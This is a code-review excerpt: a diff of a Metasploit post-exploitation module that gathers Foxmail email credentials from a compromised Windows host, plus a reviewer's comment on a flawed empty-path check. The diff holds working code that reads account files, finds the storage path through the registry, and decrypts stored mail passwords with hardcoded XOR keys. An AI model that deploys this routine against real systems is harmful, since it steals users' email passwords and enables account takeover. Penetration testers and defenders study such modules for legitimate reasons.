modules/post/windows/gather/credentials/foxmail.rb

```diff
@@ -0,0 +1,196 @@
+      version = 0
+      if file[0] == "\xD0"
+        offset = 2
+      else
+        offset = 9
+        version = 1
+      end
+      index = 0
+      buffer = ''
+      email_info = {}
+      while index < file.length
+        if (file[index] && file[index] > "\x20" && file[index] < "\x7f" && file[index] != "\x3d")
+          buffer += file[index]
+          if ['Email', 'IncomingServer', 'OutgoingServer', 'Password'].include?(buffer)
+            email_info[buffer] = find_string(file, index + offset) || nil
+          elsif ['IncomingPort', 'OutgoingPort'].include?(buffer)
+            email_info[buffer] = find_string(file, index + 5, 2) || nil
+          elsif ['InComingSSL', 'OutgoingSSL'].include?(buffer)
+            email_info[buffer] = find_string(file, index + 5, 2) == 1 || false
+          else
+            pass
+          end
+        else
+          buffer = ''
+        end
+        index += 1
+      end
+      email_info['Password'] = foxmail_crypto(version, email_info['Password']) if email_info['Password']
+      tbl << {
+        email: email_info['Email'],
+        server: email_info['IncomingServer'],
+        port: email_info['IncomingPort'],
+        ssl: email_info['InComingSSL'],
+        password: email_info['Password']
+      }
+      tbl << {
+        email: email_info['Email'],
+        server: email_info['OutgoingServer'],
+        port: email_info['OutgoingPort'],
+        ssl: email_info['OutgoingSSL'],
+        password: email_info['Password']
+      }
+    end
+    return tbl
+  end
+
+  def foxmail_crypto(version, ciphertext)
+    miag_crypt = '~draGon~'
+    v7_miag_crypt = '~F@7%m$~'
+    fc0 = '5A'.to_i(16)
+    if version == 1
+      miag_crypt = v7_miag_crypt.unpack('c*')
+      fc0 = '71'.to_i(16)
+    end
+    size = ciphertext.length / 2
+    index = 0
+    b = []
+    (0..size).step(1) do |i|
+      b[i] = ciphertext[index, 2].to_i(16)
+      index += 2
+    end
+    b = b[0..-2]
+    cc = []
+    cc[0] = b[0] ^ fc0
+    cc[1..-1] = b[1..-1]
+    while miag_crypt.length < b.length
+      new_miag_crypt = miag_crypt * 2
+      miag_crypt = new_miag_crypt
+    end
+    d = []
+    (1..b.length).each do |i|
+      d[i - 1] = b[i] ^ miag_crypt[i - 1]
+    end
+    d[-1] = 0
+    e = []
+    (0..d.length - 1).each do |i|
+      if (d[i] - cc[i] < 0)
+        e[i] = d[i] + 255 - cc[i]
+      else
+        e[i] = d[i] - cc[i]
+      end
+    end
+    e = e[0..-2]
+    return e.pack('C*')
+  end
+
+  def run
+    print_status("Gather Foxmail Passwords on #{sysinfo['Computer']}")
+    # get session file path
+    foxmail_path = ''
+    if datastore['ACCOUNT_PATH'].to_s.empty?
+      parent_key = 'HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview'
+      root_path = registry_getvaldata(parent_key, 'Executable')
+      foxmail_path = root_path[0, root_path.rindex('\\') + 1] + 'Storage' if !root_path.to_s.empty?
+    else
+      foxmail_path = expand_path(datastore['ACCOUNT_PATH'])
+    end
+    if foxmail_path
```

Comment:
Uh so `'' == True` in Ruby, so this logic is wrong here, as if `root_path.to_s.empty?` returns `True`, then `foxmail_path` will be a blank string, and `if foxmail_path` will evaluate to `true` and continue program execution, even though at this point you should probably raise an error that the registry key for the account path could not be found and therefore you can't determine where the user account information is stored on the target system.

Or in other words this should be `if !foxmail_path.to_s.empty?`